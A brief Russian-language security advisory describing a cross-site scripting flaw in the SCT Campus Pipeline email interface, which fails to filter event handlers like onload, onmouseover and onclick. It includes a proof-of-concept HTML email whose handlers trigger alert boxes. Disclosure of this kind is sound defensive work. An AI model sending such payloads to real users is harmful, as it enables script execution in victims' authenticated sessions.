Программа: SCT Campus Pipeline 

Уязвимость обнаружена в SCT Campus Pipeline. Удаленный пользователь может выполнить XSS нападение. 

E-mail интерфейс не фильтрует некоторые обработчики сценариев, типа onload(), onmouseover(), и onclick(). Удаленный пользователь может послать специально обработанный email, который, когда будет просмотрен целевым пользователем, выполнить произвольный код сценария в браузере целевого пользователя в контексте безопасности SCT Campus Pipeline сайта. 

Пример: 

<html>
<body onload=»alert(‘load’)»>
<img src=»http://www.hackthissite.org/avatars/hts.jpg»
onmouseover=»alert(‘mouse’)»>;
<img src=»http://www.hackthissite.org/avatars/hts.jpg»
onclick=»alert(‘clicked’)»>;
</body>
</html>



Оставить мнение